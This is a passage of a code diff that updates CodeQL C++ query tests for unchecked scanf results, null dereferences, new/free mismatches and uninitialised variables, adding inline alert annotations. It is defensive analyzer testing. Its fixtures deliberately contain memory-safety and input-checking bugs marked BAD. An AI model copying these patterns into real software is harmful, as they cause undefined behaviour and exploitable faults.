to scanf | +| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | +| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:107:3:107:8 | call to fscanf | call to fscanf | +| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:114:3:114:8 | call to sscanf | call to sscanf | +| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | +| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | +| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | +| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | +| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | +| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:291:3:291:7 | call to scanf | call to scanf | +| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:403:6:403:11 | call to sscanf | call to sscanf | +| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | +| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | +| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | +| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | +| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | +| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | +| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | edges | test.c:10:31:10:32 | sscanf output argument | test.c:11:7:11:7 | x | provenance | | | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | provenance | | @@ -164,25 +186,3 @@ nodes | test.cpp:575:30:575:31 | scanf output argument | semmle.label | scanf output argument | | test.cpp:577:9:577:9 | i | semmle.label | i | subpaths -#select -| test.cpp:35:7:35:7 | i | test.cpp:34:15:34:16 | scanf output argument | test.cpp:35:7:35:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:34:3:34:7 | call to scanf | call to scanf | -| test.cpp:68:7:68:7 | i | test.cpp:67:15:67:16 | scanf output argument | test.cpp:68:7:68:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:67:3:67:7 | call to scanf | call to scanf | -| test.cpp:80:7:80:7 | i | test.cpp:79:15:79:16 | scanf output argument | test.cpp:80:7:80:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:79:3:79:7 | call to scanf | call to scanf | -| test.cpp:90:7:90:8 | * ... | test.cpp:89:15:89:15 | scanf output argument | test.cpp:90:7:90:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:89:3:89:7 | call to scanf | call to scanf | -| test.cpp:98:7:98:8 | * ... | test.cpp:97:15:97:15 | scanf output argument | test.cpp:98:7:98:8 | * ... | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:97:3:97:7 | call to scanf | call to scanf | -| test.cpp:108:7:108:7 | i | test.cpp:107:32:107:33 | fscanf output argument | test.cpp:108:7:108:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:107:3:107:8 | call to fscanf | call to fscanf | -| test.cpp:115:7:115:7 | i | test.cpp:114:32:114:33 | sscanf output argument | test.cpp:115:7:115:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:114:3:114:8 | call to sscanf | call to sscanf | -| test.cpp:224:8:224:8 | j | test.cpp:221:26:221:27 | scanf output argument | test.cpp:224:8:224:8 | j | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:221:7:221:11 | call to scanf | call to scanf | -| test.cpp:248:9:248:9 | d | test.cpp:246:44:246:45 | scanf output argument | test.cpp:248:9:248:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:246:25:246:29 | call to scanf | call to scanf | -| test.cpp:252:9:252:9 | d | test.cpp:250:33:250:34 | scanf output argument | test.cpp:252:9:252:9 | d | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 2. | test.cpp:250:14:250:18 | call to scanf | call to scanf | -| test.cpp:272:7:272:7 | i | test.cpp:271:15:271:16 | scanf output argument | test.cpp:272:7:272:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:271:3:271:7 | call to scanf | call to scanf | -| test.cpp:280:7:280:7 | i | test.cpp:279:15:279:16 | scanf output argument | test.cpp:280:7:280:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:279:3:279:7 | call to scanf | call to scanf | -| test.cpp:292:7:292:7 | i | test.cpp:291:15:291:16 | scanf output argument | test.cpp:292:7:292:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:291:3:291:7 | call to scanf | call to scanf | -| test.cpp:404:25:404:25 | u | test.cpp:403:29:403:30 | sscanf output argument | test.cpp:404:18:404:25 | u | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:403:6:403:11 | call to sscanf | call to sscanf | -| test.cpp:416:7:416:7 | i | test.cpp:413:19:413:20 | scanf output argument | test.cpp:416:7:416:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:413:7:413:11 | call to scanf | call to scanf | -| test.cpp:423:7:423:7 | i | test.cpp:420:19:420:20 | scanf output argument | test.cpp:423:7:423:7 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:420:7:420:11 | call to scanf | call to scanf | -| test.cpp:460:6:460:10 | value | test.cpp:455:41:455:46 | sscanf output argument | test.cpp:460:6:460:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:455:12:455:17 | call to sscanf | call to sscanf | -| test.cpp:474:6:474:10 | value | test.cpp:467:20:467:25 | scanf output argument | test.cpp:474:6:474:10 | value | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:467:8:467:12 | call to scanf | call to scanf | -| test.cpp:484:9:484:9 | i | test.cpp:480:25:480:26 | scanf output argument | test.cpp:484:9:484:9 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:480:13:480:17 | call to scanf | call to scanf | -| test.cpp:495:8:495:8 | i | test.cpp:491:25:491:26 | scanf output argument | test.cpp:495:8:495:8 | i | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 1. | test.cpp:491:13:491:17 | call to scanf | call to scanf | -| test.cpp:545:8:545:8 | f | test.cpp:541:43:541:44 | sscanf output argument | test.cpp:545:8:545:8 | f | This variable is read, but may not have been written. It should be guarded by a check that the $@ returns at least 3. | test.cpp:541:10:541:15 | call to sscanf | call to sscanf | diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref index 97e85b5abbea..7d6dbd18683f 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/MissingCheckScanf.qlref @@ -1 +1,2 @@ -Critical/MissingCheckScanf.ql \ No newline at end of file +query: Critical/MissingCheckScanf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp index 346cf607977b..f1f5e36ed251 100644 --- a/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp +++ b/cpp/ql/test/query-tests/Critical/MissingCheckScanf/test.cpp @@ -31,8 +31,8 @@ int main() { int i; - scanf("%d", &i); - use(i); // BAD: may not have written `i` + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: may not have written `i` // $ Alert[cpp/missing-check-scanf] } { @@ -64,8 +64,8 @@ int main() { int i; // Reused variable - scanf("%d", &i); - use(i); // BAD + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD // $ Alert[cpp/missing-check-scanf] if (scanf("%d", &i) == 1) { @@ -76,8 +76,8 @@ int main() { int i; // Reset variable - scanf("%d", &i); - use(i); // BAD + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD // $ Alert[cpp/missing-check-scanf] i = 1; use(i); // GOOD @@ -86,16 +86,16 @@ int main() { int *i = (int*)malloc(sizeof(int)); // Allocated variable - scanf("%d", i); - use(*i); // BAD + scanf("%d", i); // $ Source[cpp/missing-check-scanf] + use(*i); // BAD // $ Alert[cpp/missing-check-scanf] free(i); // GOOD } { int *i = new int; // Allocated variable - scanf("%d", i); - use(*i); // BAD + scanf("%d", i); // $ Source[cpp/missing-check-scanf] + use(*i); // BAD // $ Alert[cpp/missing-check-scanf] delete i; // GOOD } @@ -104,15 +104,15 @@ int main() { int i; - fscanf(get_a_stream(), "%d", &i); - use(i); // BAD: may not have written `i` + fscanf(get_a_stream(), "%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: may not have written `i` // $ Alert[cpp/missing-check-scanf] } { int i; - sscanf(get_a_string(), "%d", &i); - use(i); // BAD: may not have written `i` + sscanf(get_a_string(), "%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: may not have written `i` // $ Alert[cpp/missing-check-scanf] } { @@ -159,7 +159,7 @@ int main() { int i; - if (scanf("%d", &i) != 0) + if (scanf("%d", &i) != 0) // $ Alert[cpp/incorrectly-checked-scanf] { use(i); // BAD: scanf can return EOF } @@ -168,7 +168,7 @@ int main() { int i; - if (scanf("%d", &i) == 0) + if (scanf("%d", &i) == 0) // $ Alert[cpp/incorrectly-checked-scanf] { use(i); // BAD: checks return value incorrectly } @@ -190,7 +190,7 @@ int main() bool b; int i; - b = scanf("%d", &i); + b = scanf("%d", &i); // $ Alert[cpp/incorrectly-checked-scanf] if (b >= 1) { @@ -201,7 +201,7 @@ int main() { int i; - if (scanf("%d", &i)) + if (scanf("%d", &i)) // $ Alert[cpp/incorrectly-checked-scanf] use(i); // BAD } @@ -218,10 +218,10 @@ int main() { int i, j; - if (scanf("%d %d", &i, &j) >= 1) + if (scanf("%d %d", &i, &j) >= 1) // $ Source[cpp/missing-check-scanf] { use(i); // GOOD - use(j); // BAD: checks return value incorrectly + use(j); // BAD: checks return value incorrectly // $ Alert[cpp/missing-check-scanf] } } @@ -243,13 +243,13 @@ int main() if (maybe()) { break; } - else if (maybe() && (scanf("%5c %d", c, &d) == 1)) { // GOOD + else if (maybe() && (scanf("%5c %d", c, &d) == 1)) { // GOOD // $ Source[cpp/missing-check-scanf] use(*(int *)c); // GOOD - use(d); // BAD + use(d); // BAD // $ Alert[cpp/missing-check-scanf] } - else if ((scanf("%5c %d", c, &d) == 1) && maybe()) { // GOOD + else if ((scanf("%5c %d", c, &d) == 1) && maybe()) { // GOOD // $ Source[cpp/missing-check-scanf] use(*(int *)c); // GOOD - use(d); // BAD + use(d); // BAD // $ Alert[cpp/missing-check-scanf] } } } @@ -268,16 +268,16 @@ int main() int i; set_by_ref(i); - scanf("%d", &i); - use(i); // GOOD [FALSE POSITIVE] + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // GOOD [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } { int i; set_by_ptr(&i); - scanf("%d", &i); - use(i); // GOOD [FALSE POSITIVE] + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // GOOD [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } { @@ -288,8 +288,8 @@ int main() i = 0; } - scanf("%d", &i); - use(i); // BAD: `i` may not have been initialized + scanf("%d", &i); // $ Source[cpp/missing-check-scanf] + use(i); // BAD: `i` may not have been initialized // $ Alert[cpp/missing-check-scanf] } // --- different use --- @@ -400,8 +400,8 @@ char *my_string_copy() { for (int i = 0; i < len; i += 2) { unsigned int u; - sscanf(src + i, "%2x", &u); - *ptr++ = (char) u; // GOOD [FALSE POSITIVE]? src+i+{0,1} are always valid %x digits, so this should be OK. + sscanf(src + i, "%2x", &u); // $ Source[cpp/missing-check-scanf] + *ptr++ = (char) u; // GOOD [FALSE POSITIVE]? src+i+{0,1} are always valid %x digits, so this should be OK. // $ Alert[cpp/missing-check-scanf] } *ptr++ = 0; return DST_STRING; @@ -410,17 +410,17 @@ char *my_string_copy() { void scan_and_write() { { int i; - if (scanf("%d", &i) < 1) { + if (scanf("%d", &i) < 1) { // $ Source[cpp/missing-check-scanf] i = 0; } - use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails + use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails // $ Alert[cpp/missing-check-scanf] } { int i; - if (scanf("%d", &i) != 1) { + if (scanf("%d", &i) != 1) { // $ Source[cpp/missing-check-scanf] i = 0; } - use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails + use(i); // GOOD [FALSE POSITIVE]: variable is overwritten with a default value when scanf fails // $ Alert[cpp/missing-check-scanf] } } @@ -433,14 +433,14 @@ void scan_and_static_variable() { void bad_check() { { int i = 0; - if (scanf("%d", &i) != 0) { + if (scanf("%d", &i) != 0) { // $ Alert[cpp/incorrectly-checked-scanf] return; } use(i); // GOOD [FALSE POSITIVE]: Technically no security issue, but code is incorrect. } { int i = 0; - int r = scanf("%d", &i); + int r = scanf("%d", &i); // $ Alert[cpp/incorrectly-checked-scanf] if (!r) { return; } @@ -452,47 +452,47 @@ void bad_check() { void disjunct_boolean_condition(const char* modifier_data) { long value; - auto rc = sscanf(modifier_data, "%lx", &value); + auto rc = sscanf(modifier_data, "%lx", &value); // $ Source[cpp/missing-check-scanf] if((rc == EOF) || (rc == 0)) { return; } - use(value); // GOOD + use(value); // GOOD // $ Alert[cpp/missing-check-scanf] } void check_for_negative_test() { int res; int value; - res = scanf("%d", &value); // GOOD + res = scanf("%d", &value); // GOOD // $ Source[cpp/missing-check-scanf] if(res == 0) { return; } if (res < 0) { return; } - use(value); + use(value); // $ Alert[cpp/missing-check-scanf] } void multiple_checks() { { int i; - int res = scanf("%d", &i); + int res = scanf("%d", &i); // $ Source[cpp/missing-check-scanf] if (res >= 0) { if (res != 0) { - use(i); // GOOD: checks return value [FALSE POSITIVE] + use(i); // GOOD: checks return value [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } } } { int i; - int res = scanf("%d", &i); + int res = scanf("%d", &i); // $ Source[cpp/missing-check-scanf] if (res < 0) return; if (res != 0) { - use(i); // GOOD: checks return value [FALSE POSITIVE] + use(i); // GOOD: checks return value [FALSE POSITIVE] // $ Alert[cpp/missing-check-scanf] } } @@ -538,11 +538,11 @@ void switch_cases(const char *data) { float d, e, f; - switch (sscanf(data, "%f %f %f", &d, &e, &f)) { + switch (sscanf(data, "%f %f %f", &d, &e, &f)) { // $ Source[cpp/missing-check-scanf] case 2: use(d); // GOOD use(e); // GOOD - use(f); // BAD + use(f); // BAD // $ Alert[cpp/missing-check-scanf] break; case 3: use(d); // GOOD diff --git a/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref b/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref index f4e1c9888cb8..f9517d2a96f7 100644 --- a/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref +++ b/cpp/ql/test/query-tests/Critical/MissingNullTest/MissingNullTest.qlref @@ -1 +1,2 @@ -Critical/MissingNullTest.ql \ No newline at end of file +query: Critical/MissingNullTest.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp b/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp index 73ebe8b56feb..6a5d98466f17 100644 --- a/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp +++ b/cpp/ql/test/query-tests/Critical/MissingNullTest/test.cpp @@ -20,7 +20,7 @@ void test1(bool cond) y = *p; // BAD (p is uninitialized and could be 0) [NOT DETECTED] p = NULL; - y = *p; // BAD (p is 0) + y = *p; // BAD (p is 0) // $ Alert p = &x; y = *p; // GOOD (p points to x) p = q; @@ -32,7 +32,7 @@ void test1(bool cond) int *q = 0; memcpy(p, &y, sizeof(int)); // GOOD (p points to x) - memcpy(q, &y, sizeof(int)); // BAD (p is 0) + memcpy(q, &y, sizeof(int)); // BAD (p is 0) // $ Alert } { @@ -40,7 +40,7 @@ void test1(bool cond) int *q = 0; bcopy(&y, p, sizeof(int)); // GOOD (p points to x) - bcopy(&y, q, sizeof(int)); // BAD (p is 0) + bcopy(&y, q, sizeof(int)); // BAD (p is 0) // $ Alert } { @@ -48,14 +48,14 @@ void test1(bool cond) int *q = 0; mycopyint(&y, p); // GOOD (p points to x) - mycopyint(&y, q); // BAD (p is 0) + mycopyint(&y, q); // BAD (p is 0) // $ Alert } { int *p = 0; int *q = &x; - y = *p; // BAD (p is 0) + y = *p; // BAD (p is 0) // $ Alert memcpy(&p, &q, sizeof(p)); y = *p; // GOOD (p points to x) } @@ -64,7 +64,7 @@ void test1(bool cond) int *p = 0; int *q = &x; - y = *p; // BAD (p is 0) + y = *p; // BAD (p is 0) // $ Alert bcopy(&q, &p, sizeof(p)); y = *p; // GOOD (p points to x) } diff --git a/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref b/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref index 72039b834eb1..885b813268e5 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref +++ b/cpp/ql/test/query-tests/Critical/NewFree/NewArrayDeleteMismatch.qlref @@ -1 +1,2 @@ -Critical/NewArrayDeleteMismatch.ql +query: Critical/NewArrayDeleteMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref b/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref index 0acb486d3005..93e6941508c7 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref +++ b/cpp/ql/test/query-tests/Critical/NewFree/NewDeleteArrayMismatch.qlref @@ -1 +1,2 @@ -Critical/NewDeleteArrayMismatch.ql +query: Critical/NewDeleteArrayMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref b/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref index c7d3dfbdf085..f42f4eb16b90 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref +++ b/cpp/ql/test/query-tests/Critical/NewFree/NewFreeMismatch.qlref @@ -1 +1,2 @@ -Critical/NewFreeMismatch.ql +query: Critical/NewFreeMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NewFree/test.cpp b/cpp/ql/test/query-tests/Critical/NewFree/test.cpp index 0807eadb3338..bec4798a2b0f 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/test.cpp +++ b/cpp/ql/test/query-tests/Critical/NewFree/test.cpp @@ -33,12 +33,12 @@ void f1() void f2() { delete global_p1; // GOOD - delete global_p2; // BAD: malloc -> delete + delete global_p2; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } void f3() { - free(global_p1); // BAD: new -> delete + free(global_p1); // BAD: new -> delete // $ Alert[cpp/new-free-mismatch] free(global_p2); // GOOD } @@ -65,15 +65,15 @@ int main() delete p1; // GOOD delete [] p2; // GOOD - delete p3; // BAD: malloc -> delete + delete p3; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } { myClass *p1 = new myClass; myClass *p2 = new myClass[10]; myClass *p3 = (myClass *)malloc(sizeof(myClass)); - free(p1); // BAD: new -> free - free(p2); // BAD: new[] -> free + free(p1); // BAD: new -> free // $ Alert[cpp/new-free-mismatch] + free(p2); // BAD: new[] -> free // $ Alert[cpp/new-free-mismatch] free(p3); // GOOD } @@ -88,7 +88,7 @@ int main() myClass *p1 = (myClass *)my_malloc(sizeof(myClass)); myClass *p2 = (myClass *)my_malloc(sizeof(myClass)); - delete p1; // BAD: malloc -> delete + delete p1; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] free(p2); // GOOD } { @@ -96,7 +96,7 @@ int main() myClass *p2 = (myClass *)malloc(sizeof(myClass)); my_delete(p1); // GOOD - my_delete(p2); // BAD: malloc -> delete + my_delete(p2); // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } // overwritten @@ -135,7 +135,7 @@ void test2() void *b = my_malloc_2(10); free(a); // GOOD - delete b; // BAD: malloc -> delete + delete b; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } void *my_malloc_3(size_t size) @@ -152,7 +152,7 @@ void test3() void *b = my_malloc_3(10); free(a); // GOOD - delete b; // BAD: malloc -> delete + delete b; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] } void test4(bool do_array_delete) @@ -162,11 +162,11 @@ void test4(bool do_array_delete) if (do_array_delete) { - delete [] mc; // BAD + delete [] mc; // BAD // $ Alert[cpp/new-delete-array-mismatch] delete [] mc_array; // GOOD } else { delete mc; // GOOD - delete mc_array; // BAD + delete mc_array; // BAD // $ Alert[cpp/new-array-delete-mismatch] } } @@ -179,7 +179,7 @@ void test5(bool do_array_delete) { delete [] c_array_ptr_2; // GOOD } else { - delete c_array_ptr_2; // BAD + delete c_array_ptr_2; // BAD // $ Alert[cpp/new-array-delete-mismatch] } } @@ -211,7 +211,7 @@ void test7(bool do_array_delete) { if (do_array_delete) { - delete [] global_mc; // BAD + delete [] global_mc; // BAD // $ Alert[cpp/new-delete-array-mismatch] } else { delete global_mc; // GOOD } @@ -229,15 +229,15 @@ void test8(bool cond) } free(a); // GOOD - delete a; // BAD: malloc -> delete - delete [] a; // BAD: malloc -> delete[] + delete a; // BAD: malloc -> delete // $ Alert[cpp/new-free-mismatch] + delete [] a; // BAD: malloc -> delete[] // $ Alert[cpp/new-free-mismatch] - free(b); // BAD: new -> free + free(b); // BAD: new -> free // $ Alert[cpp/new-free-mismatch] delete b; // GOOD - delete [] b; // BAD: new -> delete[] + delete [] b; // BAD: new -> delete[] // $ Alert[cpp/new-delete-array-mismatch] - free(c); // BAD: new[] -> free - delete c; // BAD: new[] -> delete + free(c); // BAD: new[] -> free // $ Alert[cpp/new-free-mismatch] + delete c; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] delete [] c; // GOOD } @@ -268,8 +268,8 @@ class ClassWithMembers ~ClassWithMembers() { delete a; // GOOD - delete [] b; // BAD: new -> delete[] - free(c); // BAD: new -> free + delete [] b; // BAD: new -> delete[] // $ Alert[cpp/new-delete-array-mismatch] + free(c); // BAD: new -> free // $ Alert[cpp/new-free-mismatch] } private: @@ -292,7 +292,7 @@ static void map_init() static void map_shutdown() { - delete map; // BAD: new[] -> delete + delete map; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] map = 0; } @@ -307,7 +307,7 @@ class Test10 ~Test10() { - delete data; // BAD: new[] -> delete + delete data; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] } char *data; @@ -332,7 +332,7 @@ class Test11 ~Test11() { - delete data; // BAD: new[] -> delete + delete data; // BAD: new[] -> delete // $ Alert[cpp/new-array-delete-mismatch] } char *data; @@ -438,10 +438,10 @@ void test14() wchar_t *s5 = wcsdup(L"string"); wchar_t *s6 = wcsdup(L"string"); - delete s1; // BAD: strdup -> delete + delete s1; // BAD: strdup -> delete // $ Alert[cpp/new-free-mismatch] free(s2); // GOOD - delete s3; // BAD: strndup -> delete + delete s3; // BAD: strndup -> delete // $ Alert[cpp/new-free-mismatch] free(s4); // GOOD - delete s5; // BAD: wcsdup -> delete + delete s5; // BAD: wcsdup -> delete // $ Alert[cpp/new-free-mismatch] free(s6); // GOOD } diff --git a/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp b/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp index 43a286f6f97f..a39ff1c4ee97 100644 --- a/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp +++ b/cpp/ql/test/query-tests/Critical/NewFree/test2.cpp @@ -16,14 +16,14 @@ class MyTest2Class MyTest2Class() { int *a = new int; - free(a); // BAD + free(a); // BAD // $ Alert[cpp/new-free-mismatch] int *ptr_b = (int *)malloc(sizeof(int)); int *b = new(ptr_b) int; free(b); // GOOD c = new int; - free(c); // BAD + free(c); // BAD // $ Alert[cpp/new-free-mismatch] int *ptr_d = (int *)malloc(sizeof(int)); d = new(ptr_d) int; @@ -48,13 +48,13 @@ void test_operator_new() delete ptr_new; // GOOD ::operator delete(ptr_new); // GOOD - free(ptr_new); // BAD + free(ptr_new); // BAD // $ Alert[cpp/new-free-mismatch] delete ptr_opnew; // GOOD ::operator delete(ptr_opnew); // GOOD - free(ptr_opnew); // BAD + free(ptr_opnew); // BAD // $ Alert[cpp/new-free-mismatch] - delete ptr_malloc; // BAD - ::operator delete(ptr_malloc); // BAD + delete ptr_malloc; // BAD // $ Alert[cpp/new-free-mismatch] + ::operator delete(ptr_malloc); // BAD // $ Alert[cpp/new-free-mismatch] free(ptr_malloc); // GOOD } diff --git a/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref b/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref index b261c020f534..2a0f2052bea8 100644 --- a/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref +++ b/cpp/ql/test/query-tests/Critical/NotInitialised/NotInitialised.qlref @@ -1 +1,2 @@ -Critical/NotInitialised.ql \ No newline at end of file +query: Critical/NotInitialised.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp b/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp index bc9093cd53de..c83dabba53d2 100644 --- a/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp +++ b/cpp/ql/test/query-tests/Critical/NotInitialised/test.cpp @@ -1,6 +1,6 @@ void test1() { int local; - int x = local; // BAD + int x = local; // BAD // $ Alert static int static_local; int y = static_local; // GOOD @@ -9,7 +9,7 @@ void test1() { int z = initialised; // GOOD } -int uninitialised_global; // BAD +int uninitialised_global; // BAD // $ Alert static int uninitialised_static_global; // GOOD int initialized_global = 0; // GOOD diff --git a/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref b/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref index 53beb09ebd71..0459fddee60f 100644 --- a/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref +++ b/cpp/ql/test/query-tests/Critical/OverflowCalculated/NoSpaceForZeroTerminator.qlref @@ -1 +1,2 @@ 